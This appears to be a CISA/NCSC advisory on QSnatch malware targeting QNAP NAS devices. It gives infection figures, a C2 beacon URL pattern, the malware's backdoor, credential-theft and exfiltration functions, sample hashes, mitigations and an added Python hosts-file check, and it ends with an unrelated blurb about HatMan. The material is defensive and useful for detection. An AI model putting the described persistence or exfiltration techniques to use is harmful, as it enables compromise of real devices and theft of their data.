It is important to note that infrastructure used by the malicious cyber actors in both campaigns is not currently active, but the threat remains to unpatched devices.  

Although the identities and objectives of the malicious cyber actors using QSnatch are currently unknown, the malware is relatively sophisticated, and the cyber actors demonstrate an awareness of operational security.

Global distribution of infections  

Analysis shows a significant number of infected devices. In mid-June 2020, there were approximately 62,000 infected devices worldwide; of these, approximately 7,600 were in the United States and 3,900 were in the United Kingdom. Figure 1 below shows the location of these devices in broad geographic terms.

Figure 1: Location QNAP NAS devices infected by QSnatch

Delivery and exploitation

The infection vector has not been identified, but QSnatch appears to be injected into the device firmware during the infection stage, with the malicious code subsequently run within the device, compromising it. The attacker then establishes a command and control (C2) channel using a domain generation algorithm (DGA), which periodically generates multiple domain names for use in C2 communications; the C2 servers are contacted with the following HTTP GET request:

HTTP GET https://[generated-address]/qnap_firmware.xml?=t[timestamp][1]

Malware functionalities  

Analysis shows that QSnatch malware contains multiple functionalities, such as:

CGI password logger: installs a fake version of the device admin login page, logging successful authentications and passing them to the legitimate login page.
Credential scraper.
SSH backdoor: allows the cyber actor to execute arbitrary code on a device.
Exfiltration: when run, QSnatch steals a predetermined list of files, which includes system configurations and log files. These are encrypted with the actor’s public key and sent to their infrastructure over HTTPS.
Webshell functionality for remote access.

Persistence

The malware appears to gain persistence by preventing updates from installing on the infected QNAP device. The attacker modifies the system hosts file, redirecting core domain names used by the NAS to local out-of-date versions so updates can never be installed.
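A check for this persistence technique, added here as an example (not CISA/NCSC tooling): it parses a hosts file and flags any entry that pins a vendor domain, since an appliance should resolve its update servers through DNS, not a static hosts entry. The vendor suffix (.qnap.com) and the sample hosts content are constructed assumptions for illustration; the page does not name the redirected domains.

```python
"""Flag hosts-file entries that pin vendor update domains, the QSnatch
trick for keeping an infected NAS from ever fetching a firmware update."""
import ipaddress

# Assumed vendor suffixes an appliance should never resolve via /etc/hosts.
WATCHED_SUFFIXES = (".qnap.com",)

# Constructed sample hosts file (not taken from an infected device).
SAMPLE_HOSTS = """\
127.0.0.1   localhost
::1         localhost ip6-localhost
# legitimate internal entry
10.0.0.5    fileserver.corp.internal
127.0.0.1   update.qnap.com  # pinned to loopback: updates silently fail
192.168.1.20 download.qnap.com
"""

def parse_hosts(text: str):
    """Yield (ip, hostname, line_no) for every mapping, skipping comments."""
    for no, line in enumerate(text.splitlines(), 1):
        line = line.split("#", 1)[0].strip()   # drop inline and full-line comments
        if not line:
            continue
        fields = line.split()
        ip, names = fields[0], fields[1:]
        for name in names:
            yield ip, name.lower(), no

def is_local_or_private(ip: str) -> bool:
    """True for loopback, RFC1918/ULA or unspecified targets (never a real update server)."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_private or addr.is_unspecified

def suspicious_pins(text: str, suffixes=WATCHED_SUFFIXES) -> list:
    """Return every hosts entry for a watched vendor domain with its target class."""
    findings = []
    for ip, name, no in parse_hosts(text):
        if name.endswith(suffixes):
            findings.append({"line": no, "host": name, "ip": ip,
                             "local_target": is_local_or_private(ip)})
    return findings

if __name__ == "__main__":
    for f in suspicious_pins(SAMPLE_HOSTS):
        print(f)
```

On a live device, read /etc/hosts into `text` and treat any finding as grounds for the factory reset the Mitigations section calls for before re-flashing firmware.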

Samples

The following tables provide hashes of related QSnatch samples found in open-source malware repositories. File types fall into two buckets: (1) shell scripts (see table 1) and (2) shell script compiler (SHC)-compiled executable and linking format (ELF) shell scripts (see table 2). One notable point is that some samples intentionally patch the infected QNAP for Samba remote code execution vulnerability CVE-2017-7494.  

Table 1: QSnatch samples – shell scripts

SH Samples (SHA256)

Table 2: QSnatch samples – SHC-compiled ELF shell scripts

SH Samples (SHA256)
18a4f2e7847a2c4e3c9a949cc610044bde319184ef1f4d23a8053e5087ab641b
3615f0019e9a64a78ccb57faa99380db0b36146ec62df768361bca2d9a5c27f2
845759bb54b992a6abcbca4af9662e94794b8d7c87063387b05034ce779f7d52
6e0f793025537edf285c5749b3fcd83a689db0f1c697abe70561399938380f89
Mitigations

As stated above, once a device has been infected, attackers have been known to make it impossible for administrators to successfully run the needed firmware updates. This makes it extremely important for organizations to ensure their devices have not been previously compromised. Organizations that are still running a vulnerable version must run a full factory reset on the device prior to completing the firmware upgrade to ensure the device is not left vulnerable.

The usual checks to ensure that the latest updates are installed still apply. To prevent reinfection, this recommendation also applies to devices previously infected with QSnatch but from which the malware has been removed.

To prevent QSnatch malware infections, CISA and NCSC strongly recommend that organizations take the recommended measures in QNAP’s November 2019 advisory.[2]

CISA and NCSC also recommend organizations consider the following mitigations:  

Verify that you purchased QNAP devices from reputable sources.  
If sources are in question, run a full factory reset on the device prior to completing the firmware upgrade. For additional supply chain recommendations, see CISA’s tip on Securing Network Infrastructure Devices.

Block external connections when the device is intended to be used strictly for internal storage.

References

[1] QSnatch – Malware designed for QNAP NAS devices
[2] QNAP: Security Advisory for Malware QSnatch

Revisions
July 27, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

MAR-17-352-01 HatMan—Safety System Targeted Malware. This malware analysis report discusses the components and capabilities of the HatMan malware and some potential mitigations. Media reporting also refers to this malware as both TRITON and TRISIS.